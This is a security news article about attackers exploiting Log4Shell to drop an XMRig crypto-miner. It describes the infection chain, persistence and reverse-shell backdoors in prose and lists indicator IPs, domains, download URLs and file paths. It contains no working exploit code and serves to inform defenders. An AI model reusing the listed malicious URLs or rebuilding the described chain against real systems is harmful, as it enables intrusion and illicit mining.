Log4j Strikes Again: New Exploit Deploys Crypto-Mining Malware

Log4Shell (CVE-2021-44228), a critical vulnerability discovered in the Apache Log4j logging library, was exploited by various threat actors following its disclosure on November 24, 2021. 

It allowed remote code execution, enabling attackers to gain unauthorized access to and control over vulnerable systems, as its widespread use in numerous applications and services made it a prime target for exploitation. 

Nation-state actors, cybercriminals, and opportunistic hackers, including groups like APT41 and Conti, leveraged Log4Shell to execute malicious activities, such as data theft, espionage, and ransomware attacks.

In the month of July 2024, a honeypot known as Confluence discovered an attempt to exploit Log4Shell coming from a Tor exit node with the IP address 185.220.101[.]34. 

After conducting additional research, it was discovered that the perpetrators of the attack were exploiting the Log4Shell vulnerability in order to install the XMRig cryptocurrency miner on systems that had become compromised. 

This malicious activity, aimed at generating profit through illicit mining operations, highlights the ongoing threat posed by opportunistic threat actors exploiting vulnerabilities for financial gain.

Attack flow

The attackers are exploiting a vulnerability in Log4j to gain initial access to the system. The vulnerability allows them to execute arbitrary code on the target system, where the attackers are downloading a malicious Java class from a remote server and then executing it. 

The malicious Java class creates a file named /tmp/lte and then downloads another file from a remote server to the same location, which is then made executable and executed. The attackers are likely using this technique to install malware on the target system.

While the Java class downloads an obfuscated Bash script from http://nfdo.shop/lte, which, upon execution, performs system reconnaissance to gather information about the target’s memory and CPU resources. 

It then downloads an XMRig cryptocurrency miner from http://nfdo.shop/componist and configures it to mine Monero on the cmpnst.info pool. Finally, the script establishes persistence by creating a systemd service or cron job, depending on the user’s privileges and system availability, to ensure its continued execution even after a reboot.

 Base64 content

The script establishes a reverse shell using Perl and Netcat, configuring backdoors on multiple ports for remote control, which maintains persistence using GPG encryption with a passphrase. 

Then it collects detailed system information, including CPU details, OS version, user information, network connections, and running processes, which is sent to a remote server via an HTTP POST request. 

A system was potentially compromised through the Log4Shell vulnerability (CVE-2021-44228) by the IP address 185.220.101.34. Indicators suggest the attacker attempted to exploit the vulnerability using malicious payloads containing the domains superr.buzz, cmpnst.info, nfdo.shop, and rirosh.shop.

According to DataDog, the suspicious file writes were attempted at locations  /tmp/lte, /bin/rcd, /bin/componist, and /bin/nfdo, possibly to install malware or maintain persistence on the system.  

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here